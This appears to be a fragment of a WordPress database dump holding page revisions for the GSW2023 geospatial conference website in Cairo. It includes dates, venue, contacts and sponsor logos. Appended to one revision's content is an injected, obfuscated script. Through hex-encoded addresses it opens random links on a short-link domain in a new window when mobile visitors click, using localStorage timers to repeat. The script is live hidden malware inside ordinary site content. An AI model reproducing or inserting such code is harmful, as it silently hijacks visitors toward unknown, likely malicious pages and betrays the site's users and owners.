parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-27 12:06:34','2023-07-27 12:06:34','',3066,'https://gsw2023.com/?p=5057',0,'revision','',0),
(5058,1,'2023-07-28 18:45:41','2023-07-28 18:45:41','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 